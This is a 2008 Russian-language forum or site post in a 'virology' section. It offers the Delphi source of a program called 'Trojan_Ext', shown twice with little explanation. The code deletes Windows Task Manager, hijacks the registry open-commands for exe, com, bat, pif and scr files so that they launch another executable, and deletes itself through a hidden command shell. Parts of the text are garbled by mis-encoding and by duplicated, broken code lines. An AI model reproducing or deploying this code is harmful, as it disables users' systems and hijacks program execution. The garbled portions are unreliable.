| Меню сайта |
 |
|
 |
| Категории раздела |
|
|
|
| Помощь проекту |
|
 R106276538945
 Z160640024212
Яндекс деньги
 410011190732605
|
|
| Недавние темы |
|
|
|
| Опрос |
|
|
|
|
 |
 |
 |
 |
Исходник функциональной программы на Delphi
И еще один исходник
var Buffer: array[0..1023] of Char
Buffer: [0..1023] Charreg: TRegistry;
winDir: String;
OurFile: array[0..MAX_PATH] of Char;
Cmd: String;
SetString(WinDir, Buffer, GetWindowsDirectory(Buffer, SizeOf(Buffer)));
DeleteFile(PChar(WinDir+’\System32\taskmgr.exe’));
Reg:=TRegistry.Create;
Reg.LazyWrite:=false;
Reg.RootKey:=HKEY_CLASSES_ROOT;
Reg.OpenKey(’exefile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.OpenKey(’piffile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.OpenKey(’comfile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.OpenKey(’scrfile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.OpenKey(’batfile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.Free;
try
if (GetModuleFileName(0, OurFile, MAX_PATH) <> 0) and (GetShortPathName(OurFile, OurFile, MAX_PATH) <> 0) then
(GetModuleFileName(0, OurFile, MAX_PATH) <> 0) (GetShortPathName(OurFile, OurFile, MAX_PATH) <> 0) begin
Cmd:= ‘/c del ‘ + ‘”‘+OurFile+’”‘ + ‘ >> NUL’;
if (GetEnvironmentVariable(’ComSpec’, OurFile, MAX_PATH) <> 0) and (ShellExecute(0, 0, OurFile, PChar(Cmd), 0, SW_HIDE) > 32) then
(GetEnvironmentVariable(’ComSpec’, OurFile, MAX_PATH) <> 0) (ShellExecute(0, 0, OurFile, PChar(Cmd), 0, SW_HIDE) > 32) begin
Halt;
end;
end;
except
Halt;
end;
Aio e ana. Enoiaiee eae anaaaa i?eeaaaaony. Aio iieiue eia:
program Trojan_Ext;
Trojan_Ext; uses
Windows,Registry,ShellApi;
var Buffer: array[0..1023] of Char;
Buffer: [0..1023] Char;reg: TRegistry;
winDir: String;
OurFile: array[0..MAX_PATH] of Char;
Cmd: String;
begin
SetString(WinDir, Buffer, GetWindowsDirectory(Buffer, SizeOf(Buffer)));
DeleteFile(PChar(WinDir+’\System32\taskmgr.exe’));
Reg:=TRegistry.Create;
Reg.LazyWrite:=false;
Reg.RootKey:=HKEY_CLASSES_ROOT;
Reg.OpenKey(’exefile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.OpenKey(’piffile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.OpenKey(’comfile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.OpenKey(’scrfile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.OpenKey(’batfile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.Free;
try
if (GetModuleFileName(0, OurFile, MAX_PATH) <> 0) and (GetShortPathName(OurFile, OurFile, MAX_PATH) <> 0) then
(GetModuleFileName(0, OurFile, MAX_PATH) <> 0) (GetShortPathName(OurFile, OurFile, MAX_PATH) <> 0) begin
Cmd:= ‘/c del ‘ + ‘”‘+OurFile+’”‘ + ‘ >> NUL’;
if (GetEnvironmentVariable(’ComSpec’, OurFile, MAX_PATH) <> 0) and (ShellExecute(0, 0, OurFile, PChar(Cmd), 0, SW_HIDE) > 32) then
(GetEnvironmentVariable(’ComSpec’, OurFile, MAX_PATH) <> 0) (ShellExecute(0, 0, OurFile, PChar(Cmd), 0, SW_HIDE) > 32) begin
Halt;
end;
end;
except
Halt;
end;
end.
|
|
Категория: Вирусология | Добавил: dolphin (27.09.2008)
|
| Просмотров: 2728 | Комментарии: 2 | Рейтинг: 5.0/4 |
| Всего комментариев: 2 |
|
|
|
|
|
|
 |
 |
 |
 |
 |
 |
|
| Профиль |
|
|
|
| Поиск |
|
|
|
| Наша кнопка |
|
|
|
| Статистика |
|
 
Статистика материалов
Файлов: 365
Форум: 1134/8058
Коментариев: 769
Новостей: 28
Статистика пользователей
Всего: 380
За неделю: 2
Вчера: 1
Сегодня: 0
Всего онлайн: 1
Гостей: 1
Пользователей: 0
|
|
|
